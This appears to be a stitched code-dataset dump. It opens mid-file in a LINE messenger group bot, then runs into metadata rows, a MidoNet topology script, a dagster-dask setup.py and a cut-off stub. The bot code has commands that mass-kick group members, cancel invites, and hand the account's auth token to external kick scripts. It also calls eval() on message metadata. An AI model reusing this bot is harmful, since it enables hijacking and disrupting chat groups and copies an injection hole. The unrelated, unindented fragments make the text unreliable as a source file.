cl.sendMessage(msg.to, "owner added")
if msg.contentType == 13:
if msg._from in creator:
if wait2["delowner"] == True:
if msg.contentMetadata["mid"] in org["owner"]:
del org["owner"][msg.contentMetadata["mid"]]
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Owner deleted")
else:
cl.sendMessage(msg.to,"Owner not found")
#===[ Add admin ☆☆☆ ]
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"]:
if wait2["addadmin"]==True:
if msg.contentMetadata["mid"] in org["admin"]:
cl.sendMessage(msg.to, "was admin")
wait2["addadmin"]=False
else:
org["admin"][msg.contentMetadata["mid"]] = True
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to, "admin added")
wait2["addadmin"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"]:
if wait2["deladmin"]==True:
if msg.contentMetadata["mid"] in org["admin"]:
del org["admin"][msg.contentMetadata["mid"]]
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
wait2["deladmin"]=False
cl.sendMessage(msg.to,"s deleted")
else:
cl.sendMessage(msg.to,"S not found")
#====[ Add staff ☆☆☆ ]
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["addstaff"]==True:
if msg.contentMetadata["mid"] in org["staff"]:
cl.sendMessage(msg.to, "was staff")
wait2["addstaff"]=False
else:
org["staff"][msg.contentMetadata["mid"]] = True
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to, "staff added")
wait2["addstaff"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["delstaff"]==True:
if msg.contentMetadata["mid"] in org["staff"]:
del org["staff"][msg.contentMetadata["mid"]]
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"staff deleted")
wait2["delstaff"]=False
else:
cl.sendMessage(msg.to,"Staff not found")
wait2["delstaff"]=False
#========[ BLACKLIST ]============#
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["ablacklist"]==True:
if msg.contentMetadata["mid"] in wait2["blacklist"]:
cl.sendMessage(to, "Was BL boss")
wait2["ablacklist"]=False
else:
wait2["blacklist"][msg.contentMetadata["mid"]] = True
with open('wait2.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendMessage(to, "Blacklist Saved")
wait2["ablacklist"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["dblacklist"]==True:
if msg.contentMetadata["mid"] in wait2["blacklist"]:
del wait2["blacklist"][msg.contentMetadata["mid"]]
with open('wait2.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendMessage(to, "Blacklist Removed")
wait2["dblacklist"]=False
else:
cl.sendMessage(to," target not found")
wait2["dblacklist"]=False
if msg.contentType == 13:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["Invi"] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendMessage(msg.to,"-> " + _name + " was here")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendMessage(msg.to,"Done Invite : " + _name)
if op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
                if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 7:
pass
elif text is None:
return
elif msg.toType == 2:
if msg.text == self.resp + "help":
if msg._from in creator:
cl.sendMessage(msg.to,helpMessage)
if msg.text in [".key owner"]:
if msg._from in creator or msg._from in org["owner"]:
cl.sendMessage(msg.to,helpMessage1)
if msg.text in [".key admin"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
cl.sendMessage(msg.to,helpMessage2)
elif msg.text in [".reboot"]:
if msg._from in creator:
print ("[Command]Like executed")
try:
cl.sendMessage(msg.to,"Restarting...")
restart_program()
except:
cl.sendMessage(msg.to,"Please wait")
restart_program()
pass
elif msg.text in [".absen"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
cl.sendMessage(msg.to, "stay...")
elif msg.text == self.resp + "key":
if msg._from in creator or msg._from in org["owner"]:
md = " _[] ?? []_\n\n"
md += "" +self.resp+ " key\n"
md += "" +self.resp+ " owner\n"
md += "" +self.resp+ " admin\n"
md += "" +self.resp+ " staff\n"
md += "" +self.resp+ " banlist\n"
md += "" +self.resp+ " kick\n"
md += "" +self.resp+ " cancel\n"
md += "" +self.resp+ " ourl\n"
md += "" +self.resp+ " curl\n"
md += "" +self.resp+ " grupset\n"
md += "" +self.resp+ " grup\n"
md += "" +self.resp+ " invite\n"
md += "" +self.resp+ " inv to\n"
md += "" +self.resp+ " bye\n"
md += "" +self.resp+ " left in\n"
md += "" +self.resp+ " ct\n"
md += "" +self.resp+ " mid\n\n"
md += " _[] ?? []_"
cl.sendMessage(msg.to,md)
elif self.resp + "ct @" in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = cl.getContact(ls)
mi_d = contact.mid
cl.sendContact(msg.to, mi_d)
elif self.resp + "cn " in msg.text:
if msg._from in creator:
x = cl.getProfile()
x.displayName = msg.text.replace("cn ","")
cl.updateProfile(x)
cl.sendMessage(msg.to, " done")
elif msg.text in [".runtime"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
eltime = time.time() - mulai
van = "Bot run "+waktu(eltime)
cl.sendMessage(msg.to,van)
elif msg.text == self.resp + "ourl":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
X = cl.getGroup(msg.to)
if X.preventedJoinByTicket == False:
cl.updateGroup(X)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to,"line://ti/g/" + gurl)
else:
X.preventedJoinByTicket = False
cl.updateGroup(X)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to,"line://ti/g/" + gurl)
elif msg.text == self.resp + "curl":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
X = cl.getGroup(msg.to)
if X.preventedJoinByTicket == True:
cl.sendMessage(msg.to,"qr was close")
else:
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to,"done..")
elif self.resp + "mid @" in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
try:
cl.sendMessage(msg.to,str(mention['M']))
except Exception as e:
pass
elif ".kick " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["admin"] or target in org["staff"]:
pass
else:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
elif msg.text == self.resp + "nodeall":
if msg._from in creator:
cmd = 'kickall.js gid={} token={}'.format(receiver, cl.authToken)
group = cl.getGroup(receiver)
members = [o.mid for o in group.members if o.mid not in creator and o.mid not in org["owner"] and o.mid not in org["admin"] and o.mid not in org["staff"]]
for invitees in group.invitee:
for o in group.members:
if invitees.mid not in org["owner"]:
if o.mid not in org["owner"]:
cmd += ' uid={}'.format(invitees.mid)
cmd += ' uid={}'.format(o.mid)
print(cmd)
success = execute_js(cmd)
elif msg.text == self.resp + "nodes":
if msg._from in creator:
cmd = 'nook.js gid={} token={}'.format(to, cl.authToken)
group = cl.getGroup(to)
for a in creator:
cl.sendMessage(a, "im has been used js from group %s" %group.name)
members = [o.mid for o in group.members if o.mid not in creator and o.mid not in org["owner"] and o.mid not in org["admin"] and o.mid not in org["staff"]]
for o in group.members:
if o.mid not in creator and o.mid not in org["staff"]:
cmd += ' uid={}'.format(o.mid)
print(cmd)
success = execute_js(cmd)
elif self.resp + "kick " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["admin"] or target in org["staff"]:
pass
else:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
elif msg.text in [".bot cancel"]:
if msg._from in creator or msg._from in org["owner"]:
group = cl.getGroup(msg.to)
if group.invitee is None:
cl.sendMessage(op.message.to, " gada pendingan bos..")
else:
nama = [contact.mid for contact in group.invitee]
for x in nama:
if x not in org["owner"]:
cl.cancelGroupInvitation(msg.to, [x])
time.sleep(0.3)
cl.sendMessage(msg.to, "done.")
elif msg.text == self.resp + "cancel":
if msg._from in creator or msg._from in org["owner"]:
group = cl.getGroup(msg.to)
if group.invitee is None:
cl.sendMessage(op.message.to, "gada pendingan bos..")
else:
nama = [contact.mid for contact in group.invitee]
for x in nama:
if x not in org["owner"]:
cl.cancelGroupInvitation(msg.to, [x])
time.sleep(0.3)
cl.sendMessage(to, "done.")
elif msg.text == self.resp + "grup":
if msg._from in creator:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
gn = cl.getGroup(i).name
h += " %s\n" % (gn)
cl.sendMessage(msg.to,"My grup \n"+ h)
elif self.resp + "inv to " in msg.text:
if msg._from in creator:
ng = msg.text.replace("inv to ","")
gid = cl.getGroupIdsJoined()
x = msg._from
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.inviteIntoGroup(i,[x])
cl.sendMessage(msg.to,"Success join to ["+ h +"] group")
else:
pass
elif self.resp + "leave grup " in msg.text:
if msg._from in creator:
ng = msg.text.replace("leave grup ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendMessage(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
cl.sendMessage(msg.to,"Success left ["+ h +"] group")
else:
pass
elif msg.text in [".out all grup"]:
if msg._from in creator:
gid = ki.getGroupIdsJoined()
for i in gid:
cl.sendMessage(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
cl.sendMessage(msg.to,"Success left all group")
elif msg.text == self.resp + "invite on":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["Invi"] == False:
wait2["Invi"] = True
cl.sendMessage(msg.to, "send contact auto Invite on")
elif msg.text == self.resp + "invite off":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["Invi"] == True:
wait2["Invi"] = False
cl.sendMessage(msg.to, "auto Invite off")
elif msg.text in [".kickall"]:
if msg._from in creator or msg._from in org["owner"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
for x in nama:
if x not in creator:
if x not in org["owner"]:
if x not in org["admin"]:
if x not in org["staff"]:
try:
cl.kickoutFromGroup(msg.to,[x])
except:
pass
elif msg.text in [".autojoin on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=True
cl.sendMessage(msg.to,"Auto join in Activated")
elif msg.text in [".autojoin off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=False
cl.sendMessage(msg.to,"Auto join not Active")
elif msg.text in [".bye"]:
if msg._from in creator or msg._from in org["owner"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif msg.text == self.resp + "bye":
if msg._from in creator or msg._from in org["owner"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in [".add owner on"]:
if msg._from in creator:
if wait2["addowner"] == False:
wait2["addowner"] = True
cl.sendMessage(msg.to, "Please send Contact for add")
else:
cl.sendMessage(msg.to, "send Contact for add")
elif msg.text in [".add owner off"]:
if msg._from in creator:
if wait2["addowner"] == True:
wait2["addowner"] = False
cl.sendMessage(msg.to, "Add owner was off")
else:
cl.sendMessage(msg.to, "Was off")
elif msg.text in [".del owner on"]:
if msg._from in creator:
if wait2["delowner"] == False:
wait2["delowner"] = True
cl.sendMessage(msg.to, "Please send Contact for Removed")
else:
cl.sendMessage(msg.to, "Was on,, Please send Contact for.Removed")
elif msg.text in [".del owner off"]:
if msg._from in creator:
if wait2["delowner"] == True:
wait2["delowner"] = False
cl.sendMessage(msg.to, "Removed owner was off")
else:
cl.sendMessage(msg.to, "Was off")
elif msg.text in [".clear owner"]:
if msg._from in creator:
org["owner"] = {}
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes clear")
elif msg.text == self.resp + "owner":
if msg._from in creator:
if org["owner"] == {}:
cl.sendMessage(msg.to,"empty Tlist")
else:
mc = []
for mi_d in org["owner"]:
mc.append(mi_d)
pass
cban = cl.getContacts(mc)
nban = []
for x in range(len(cban)):
nban.append(cban[x].displayName)
pass
jo = "\n_ ".join(str(i) for i in nban)
cl.sendMessage(msg.to,"_====[ Owner List ]====_\n\n_ %s\n\n_====[ Total: %s ]====_"%(jo,str(len(cban))))
elif msg.text == self.resp + "admin":
if msg._from in creator:
if org["admin"] == {}:
cl.sendMessage(msg.to,"empty Tlist")
else:
mc = []
for mi_d in org["admin"]:
mc.append(mi_d)
pass
cban = cl.getContacts(mc)
nban = []
for x in range(len(cban)):
nban.append(cban[x].displayName)
pass
jo = "\n_ ".join(str(i) for i in nban)
cl.sendMessage(msg.to,"_====[ Admin List ]====_\n\n_ %s\n\n_====[ Total: %s ]====_"%(jo,str(len(cban))))
elif msg.text == self.resp + "staff":
if msg._from in creator:
if org["staff"] == {}:
cl.sendMessage(msg.to,"empty Tlist")
else:
mc = []
for mi_d in org["staff"]:
mc.append(mi_d)
pass
cban = cl.getContacts(mc)
nban = []
for x in range(len(cban)):
nban.append(cban[x].displayName)
pass
jo = "\n_ ".join(str(i) for i in nban)
cl.sendMessage(msg.to,"_====[ Staff List ]====_\n\n_ %s\n\n_====[ Total: %s ]====_"%(jo,str(len(cban))))
elif msg.text in [".add admin"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["addadmin"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".del admin"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["deladmin"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".clear admin"]:
if msg._from in creator or msg._from in org["owner"]:
org["admin"] = {}
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes clear")
elif msg.text in [".add staff"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["addstaff"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".del staff"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["delstaff"]=True
cl.sendMessage(msg.to, "send contact")
elif msg.text in [".clear staff"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
org["staff"] = {}
with open('org.json', 'w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes clear")
elif msg.text in [".autojoin on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=True
cl.sendMessage(msg.to,"Auto join in Activated")
elif msg.text in [".autojoin off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoin"]=False
cl.sendMessage(msg.to,"Auto join not Active")
elif msg.text in [".cban"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2['blacklist'] = {}
with open('wait2.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendMessage(to,"°done boss")
elif msg.text in [".addban"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["ablacklist"]=True
cl.sendMessage(to, "please send contact")
elif msg.text in [".delban"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
wait2["dblacklist"]=True
cl.sendMessage(to, "please send contact")
elif msg.text == self.resp + "banlist":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if wait2["blacklist"] == {}:
cl.sendMessage(to,"empty list")
else:
mc = "_====[ BLACKLIST ]====_\n"
for mi_d in wait2["blacklist"]:
mc += "\n_ "+cl.getContact(mi_d).displayName
cl.sendMessage(msg.to,mc + "\n_====[ BLACKLIST ]====_")
elif msg.text in [".sp"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
start = time.time()
cl.sendMessage("u9d79f5031bc4c73a5054aa8b26c9d0c2", '.')
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "%s second" % (elapsed_time))
elif msg.text in [".protect on"]:
if msg._from in creator or msg._from in org["owner"]:
pro["Proqr"][msg.to] = True
pro["Procancel"][msg.to] = True
pro["Proinvite"][msg.to] = True
pro["Autokick"][msg.to] = True
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"High All Protection On")
elif msg.text in [".protect off"]:
if msg._from in creator or msg._from in org["owner"]:
if msg.to in pro["Proqr"]:
try:
del pro["Proqr"][msg.to]
except:
pass
if msg.to in pro["Procancel"]:
try:
del pro["Procancel"][msg.to]
except:
pass
if msg.to in pro["Proinvite"]:
try:
del pro["Proinvite"][msg.to]
except:
pass
if msg.to in pro["Autokick"]:
try:
del pro["Autokick"][msg.to]
except:
pass
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"All Protection Off")
elif msg.text == self.resp + "grup set":
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
md = ""
if msg.to in pro["Proqr"]: md+="_Protect grup : on_\n"
else: md +="_Protect grup : off_\n"
if msg.to in pro["Procancel"]: md+="_Protect cancel : on_\n"
else: md+= "_Protect cancel : off_\n"
if msg.to in pro["Proinvite"]: md+="_Protect invite : on_\n"
else: md+= "_Protect invite : off_\n"
if msg.to in pro["Autokick"]: md+="_Auto kick : on_\n"
else:md+="_Auto kick : off_\n"
if msg.to in pro["Proname"]: md+="_Protection Group Name : on_\n"
else: md+= "_Protection Group Name : off_\n"
cl.sendMessage(msg.to,"_========[ Grup set up ]========_\n\n"+ md +"_========[ Znf Bots ]========_")
elif self.resp + "gn" in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace(self.resp + "gn","").strip()
cl.updateGroup(X)
elif msg.text in ["Lockname on"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if msg.to in pro["Lockname"]:
cl.sendMessage(msg.to,"Name Group in Locked")
else:
pro["Lockname"][msg.to] = True
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
pro["gname"][msg.to] = cl.getGroup(msg.to).name
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes Locked Group Name")
elif msg.text in ["Lockname off"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
if msg.to not in pro["Lockname"]:
cl.sendMessage(msg.to,"Name Group not in Locked")
else:
del pro["Lockname"][msg.to]
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
del pro["gname"][msg.to]
with open('pro.json','w') as fp:
json.dump(pro, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes open Locked Group Name")
elif msg.text == self.resp +"mention":
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+1):
txt = u''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append({"S":str(s), "E" :str(s+6), "M":i.mid})
s += 7
txt += u'@Alin \n'
cl.sendMessage(to, text=txt, contentMetadata={u'MENTION': json.dumps({'MENTIONEES':b})}, contentType=0)
elif (".owner add" in msg.text):
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["owner"]:
cl.sendMessage(msg.to,"Was owner..")
else:
try:
org["owner"][target] = True
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes add owner")
except:
pass
elif ".owner del " in msg.text:
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in org["owner"]:
cl.sendMessage(msg.to,"not in owner..")
else:
try:
del org["owner"][target]
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove owner")
except:
pass
elif ".admin add " in msg.text:
if msg._from in creator or msg._from in org["owner"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["admin"]:
cl.sendMessage(msg.to,"was admin")
else:
try:
org["admin"][target] = True
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove admin")
except:
pass
elif ".admin del " in msg.text:
if msg._from in creator or msg._from in org["owner"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in org["admin"]:
cl.sendMessage(msg.to,"not in admin")
else:
try:
del org["admin"][target]
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove admin")
except:
pass
elif ".staff add " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in org["staff"]:
cl.sendMessage(msg.to,"was staff")
else:
try:
org["staff"][target] = True
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes add staff")
except:
pass
elif ".staff del " in msg.text:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in org["staff"]:
cl.sendMessage(msg.to,"not in staff")
else:
try:
del org["staff"][target]
with open('org.json','w') as fp:
json.dump(org, fp, sort_keys=True, indent=4)
cl.sendMessage(msg.to,"Succes remove staff")
except:
pass
elif msg.text in [".rechat"]:
if msg._from in creator or msg._from in org["owner"] or msg._from in org["admin"]:
try:
cl.removeAllMessages(op.param2)
cl.sendMessage(to,"done")
except:
pass
elif msg.text in [".add on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["message"]=True
cl.sendMessage(to,"autoAdd on")
elif msg.text in [".add off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["message"]=False
cl.sendMessage(to,"autoAdd off")
elif msg.text in [".ticket on"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoinTicket"]=True
cl.sendMessage(to,"autoJoinTicket on")
elif msg.text in [".ticket off"]:
if msg._from in creator or msg._from in org["owner"]:
wait2["autoJoinTicket"]=False
cl.sendMessage(to,"autoJoinTicket off")
elif "/ti/g/" in msg.text.lower():
if msg._from in creator or msg._from in org["owner"]:
if wait2["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
except:
e = traceback.format_exc()
with open("e","a") as error:error.write("\n{}".format(e))
| 54.345164
| 182
| 0.401048
|
a1b4029c62a29255d2ffeb829655268b5b2b2d36
| 2,982
|
py
|
Python
|
tests/mmm/topology/topology-l2gw.py
|
duarten/midonet
|
c7a5aa352a8038bdc6a463c68abc47bb411a1e7c
|
[
"Apache-2.0"
] | 1
|
2015-05-19T08:36:55.000Z
|
2015-05-19T08:36:55.000Z
|
tests/mmm/topology/topology-l2gw.py
|
duarten/midonet
|
c7a5aa352a8038bdc6a463c68abc47bb411a1e7c
|
[
"Apache-2.0"
] | null | null | null |
tests/mmm/topology/topology-l2gw.py
|
duarten/midonet
|
c7a5aa352a8038bdc6a463c68abc47bb411a1e7c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Midokura SARL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from midonetclient.api import MidonetApi
from topology.bridge import Bridge
from topology.host_interface import HostInterface
from topology.tenants import get_tenant
from topology.tunnel_zone import TunnelZone
from topology.tunnel_zone_host import TunnelZoneHost
from topology.transaction import Transaction
from topology.utils import midonet_read_host_uuid
import sys
import traceback
if __name__ == '__main__':
providerName = 'midonet_provider'
tenantNames = ['tenant0', 'tenant1']
provider = get_tenant(providerName)
if not provider:
print "provider %r not found", providerName
sys.exit(1)
providerId = provider.id
tenants = map(get_tenant,tenantNames)
if not all(tenants):
print "not all tenants are found"
sys.exit(1)
tenantIds = map(lambda tenant: tenant.id,tenants)
hosts = ['00000000-0000-0000-0000-000000000001',
'00000000-0000-0000-0000-000000000002',
'00000000-0000-0000-0000-000000000003']
addresses = ['10.0.0.8','10.0.0.9','10.0.0.10']
if not all(hosts):
print "host uuid file(s) is not found"
sys.exit(1)
api = MidonetApi('http://127.0.0.1:8080/midonet-api','admin','*')
tx = Transaction()
try:
zone = TunnelZone({'name': 'zone0', 'type': 'gre'})
zone.add(api,tx,map(lambda h,a:
TunnelZoneHost({'hostId': h,'ipAddress': a}),
hosts,addresses))
bridge1 = Bridge({'name':'bridge1','tenantId':tenantIds[0],'vlanId':"1"})
bridge1.add(api,tx,[HostInterface({'hostId': hosts[0],'name':'veth0'}),
HostInterface({'hostId': hosts[1],'name':'veth0'})])
bridge2 = Bridge({'name':'bridge2','tenantId':tenantIds[1],'vlanId':"2"})
bridge2.add(api,tx,[HostInterface({'hostId': hosts[1],'name':'veth1'}),
HostInterface({'hostId': hosts[1],'name':'veth2'})])
trunk_bridge = Bridge({'name':'bridge0','tenantId':providerId})
trunk_bridge.add(api,tx,
[HostInterface({'hostId': hosts[0],'name':'eth2'}),
HostInterface({'hostId': hosts[1],'name':'eth2'}),
bridge1,
bridge2])
except:
traceback.print_exc()
tx.rollback()
# import pdb; pdb.set_trace()
# tx.rollback()
| 39.76
| 81
| 0.632126
|
ff179388bda1ba9636cf07d7367ec22b077dcc6e
| 1,317
|
py
|
Python
|
python_modules/libraries/dagster-dask/setup.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-dask/setup.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-dask/setup.py
|
wingyplus/dagster
|
1771b49f58c62141628da6a767516d3dcb9637d6
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import find_packages, setup
def get_version():
version = {}
with open('dagster_dask/version.py') as fp:
exec(fp.read(), version) # pylint: disable=W0122
return version['__version__']
if __name__ == '__main__':
setup(
name='dagster-dask',
version=get_version(),
author='Elementl',
author_email='hello@elementl.com',
license='Apache-2.0',
description='Package for using Dask as Dagster\'s execution engine.',
url='https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-dask',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
],
packages=find_packages(exclude=['test']),
install_requires=[
'bokeh',
'dagster',
'dagster_graphql',
'dask>=1.2.2',
'distributed>=1.28.1',
],
extras_require={
'yarn': ['dask-yarn'],
'pbs': ['dask-jobqueue'],
'kube': ['dask-kubernetes'],
},
zip_safe=False,
)
| 30.627907
| 102
| 0.549734
|
19e913d0b17babfa1ed8ae8077b692c2f216a11e
| 183
|
py
|
Python
|
atcoder/abc059/b.py
|
Ashindustry007/competitive-programming
|
2eabd3975c029d235abb7854569593d334acae2f
|
[
"WTFPL"
] | 506
|
2018-08-22T10:30:38.000Z
|
2022-03-31T10:01:49.000Z
|
atcoder/abc059/b.py
|
Ashindustry007/competitive-programming
|
2eabd3975c029d235abb7854569593d334acae2f
|
[
"WTFPL"
] | 13
|
2019-08-07T18:31:18.000Z
|
